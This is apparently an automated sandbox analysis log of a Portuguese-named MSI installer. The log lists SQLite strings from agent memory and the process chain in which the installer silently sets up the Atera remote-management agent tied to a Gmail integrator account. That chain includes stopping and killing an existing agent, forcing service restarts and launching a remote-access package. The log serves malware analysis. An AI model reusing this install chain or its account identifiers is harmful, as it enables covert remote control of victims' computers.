                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132627E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326278B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO StatisticsSendTime (Timestamp) Values (@timestamp);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262915000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1831057497.0000022ADA0F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262BE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiReversingLabs: Detection: 24%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
